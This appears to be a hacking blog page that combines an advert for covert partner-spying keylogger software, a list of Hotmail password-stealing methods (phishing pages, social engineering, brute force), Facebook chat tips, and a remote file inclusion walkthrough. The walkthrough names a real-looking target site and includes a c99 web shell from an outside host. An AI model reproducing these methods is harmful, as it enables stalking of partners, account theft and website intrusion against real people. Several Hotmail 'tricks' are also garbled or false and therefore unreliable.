Check Your Cheating Partner

Spy Software (also known as a Keylogger)

Want to check if your partner is cheating on you? This software can really help you clear your doubts on your partner. This is so easy and needs no computer expert knowledge. Its just 1 single click to enter into your partner's personal world and make a decision for your future. You can hack into the complete system, pc or laptop of your spouse or girlfriend or boyfriend easily. This way you can easily crack into their online computer, check them live. Live Webcam, Live audio voice, Live Screen shots of desktop, Live Key logs, etc.

If you and the person you want to hack perhaps live together and you have access to their computer, this is the best option. By installing spy software onto their computer, it will log every activity they do on it including capturing the Hotmail or MSN password and anything else for that matter. It has a unique capture feature that saves a screenshot of every page visited online – that way if the person deletes any of the emails from their hotmail account, you can look at the screenshots stored by this amazing software, you would otherwise never be able to see those emails again. This even records keylogs, passwords, etc.

If you don’t live with your target or have access to their computer, there is still hope. This software remotely and silently installs to their computer through email. No physical access to the remote PC is needed to spy on the target computer. You can view their computer screen LIVE from anywhere at anytime via your web browser, which means you don’t need to install anything on your computer either. You will be able to view their MSN chat conversations, all web sites visited, screenshots, live webcam, audio voice and the password to all the online accounts they log into any website. It’s so stealth they never have a clue their being watched.

If you want to use this simple yet powerful software, email at: passcracker69@yahoo.com

Hack Hotmail Password Easily

Are you curious for "Hacking hotmail password" well then this post is just for you, Most people ask me to tell us the easiest way for hacking hotmail password,so here are some ways how hackers can hack your hotmail passwords so you can protect your self from these kinds of attacks

1. Url way:

This is the most easiest way For hack hotmail password.All that you need in this method is the victims username. The method is simple. all that you need to do is type " www.hotmail.com/cgi-bin/start/username ".

2.Html way

This too is very simple method to hack hotmail account password . just go to http://www.hotmail/proxy.html. Now type the username. Press login. You will get a error message. Now you need to look at the source code of the page( view>>page source). In the code you are going to find "action=someadress". Now simply copy theirs address and you are in. This it. same conditions as above apply here i.e user must not log out.



3.Hotmail phishing:

You can create fake page for hacking hotmail passwords that look same like the hotmail site. You will find the exact details at this page on creating fake pages.Just remember one thing to change method = post and your e-mail id in the action field . If you dont know html please learn it and then use it.

4. Social engineering :


This is the method very useful to hack hotmail account password if victim is someone whom you know well and is your good friend. For this method to work, you should have good logic and communication. In social engineering, hacker tries to retrieve information from victim which can help him hack hotmail account password. Say, if you know what is answer of security question, then you can easily hack hotmail account password by using Forgot Password link. So, to know his security answer, you have to use your logic. This must be done carefully as victim must not know your intensions.

5.Brute force

Brute Force Attack is the most widely known password cracking method. This attack simply tries to use every possible character combination as a password. To recover a one-character password it is enough to try 26 combinations (‘a’ to ‘z’). It is guaranteed that you will find the password
Here are the two most popular and well known Brute forcers
1.Brutus aet2
2.Munga Brute force



6.Keylogging:

This is one of the easiest method to hack hotmail account password,A keylogger, sometimes called a keystroke logger, keylogger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an account if you have physical access to victim’s computer.


Update:-

Hotmail seams to have tweaked their system . it no longer allows 2 users using the same account at same time. So the best way is to use it from the victims comp.....

Warning:This post How to hack hotmail password is for educational purposes

Facebook Chat Trick

Facebook
Annoyed when facebook wont let you status update above 420 characters???
Just add itt under 1X1 pixel photo(create using paint)
and no one will notice it!!!

(1) Annoyed by some regular irritants over the chat????
Ans:
Click Chat box,Click Friend listsType a list eg:-"CRAPS"Then add people,save it...And now you could see these people classified into a group in chat box.Just turn off the switch near them,And you will be online to all except them!!!!Or you canGoto home,Click the downward triangle next to "Most recent"and add a list,If its your first list!!

Hack a Website Using Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/crackprofile/c99.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.
Enjoy..!!